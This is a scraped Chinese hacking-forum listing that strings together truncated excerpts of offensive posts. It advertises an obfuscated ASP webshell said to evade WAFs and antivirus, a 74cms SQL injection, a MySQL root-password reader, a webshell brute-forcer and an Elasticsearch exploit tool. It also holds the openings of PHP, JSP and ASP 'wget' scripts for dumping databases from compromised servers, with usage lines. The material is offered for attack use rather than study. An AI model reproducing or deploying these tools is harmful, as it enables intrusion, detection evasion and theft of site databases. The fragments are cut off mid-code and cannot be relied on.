PHP暴露网站绝对路径的新方法

分享一个爆PHP路径的方法

寂寞的瘦子 (LISP异教徒) | 2014-05-30 00:02

74cms最新通杀注入漏洞

一个iconv引发的猪肉

经过测试官网居然没补。。。

MYSQL低权限读取ROOT密码工具

1.jpg

超强ASP木马-RedHAt Webshell

RedHAt Webshell.rar

一、 整体介绍

    本身代码经过变量转换和替换字符加密,可完美过安全狗,护卫神,D盾,safe3 Waf,KOasp木马查杀等IIS防火墙和查杀工具。
 程序结合海洋顶端asp木马、老兵asp木马、Drakblade暗黑之剑1.3版本、05年到13年主流asp木马的优点进行开发完善制作。
 程序在目录检测功能、隐藏功能、数据库操作和提权处做了较大改进,具体请看下列介绍


PHP wget 增强脱裤脚本(PDO MYSQL)

说明:脚本支持PDO和MYSQL 2种方式 优先使用PDO .如果服务器不支持PDO  就选择MYSQL 方式. 个人认为  PDO 的好处有效率高  代码简洁 通用性好  这代码稍作改动就可以拿去脱mssql

不过用php和mssql组合的应该不多- -!

     使用方法  首先要脚本中配置好主机地址 端口 数据库名称 用户名  密码 以及数据库的编码方式(常用GPK 或者UTF8 设置不对中文字段可能会出现乱码);

                  然

php wget脱裤脚本

<?php
//author: By Gavin
//Usage: wget "http://xxx.com/wget_sql.php?sn=0&en=5000000&ln=50000" -O gavin.sql

error_reporting(0);
ignore_user_abort();
set_time_limit(0);
ob_clean();

//配置数据库信息
$DB_Server="127.0.0.1:3306";
$DB_User="root";
$DB_Pass="root";   
$DB_Name="DBName"; 

//分段每次limit查询出来的条数,根据

webshell爆破工具

需要安装。net2.0 爆破速度还算可以。

Elasticsearch 代码执行漏洞利用工具

JSP wget脱裤脚本

存在依赖问题,比如tomcat下需要有oralce jdbc,我测试换的环境是oracle 10g,JDBC是classes12.jar,需要将它放到tomcat目录的common\lib下面。

java不太熟悉,听说可以利用反射方式解决依赖包问题。稍后我再研究研究,这里发出两个版本,一个是mysql的,一个是oracle的。

Mysql版本:

<%@ page contentType="text/html; charset=utf-8" %>
<%@ page language="java" %>
<%@ page imp

ASP wget脱裤脚本

看了不少人写的各种拖库脚本,什么php的、asp的呀,都基本上是有权限的备份,没权限的一条一条导,用程序去再写到文本里。如果用浏览器去执行你的脱库脚本,还是累了。其实我们用wget就可以了,这样就so easy,妈妈再也不担心你的拖库了。

asp拖mssql的库的脚本和用法示例如下:

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001" %>'这里改编码方式
<%
'用法:如果把本程序放在[url]http://www.xxx.com/sql.asp[/ur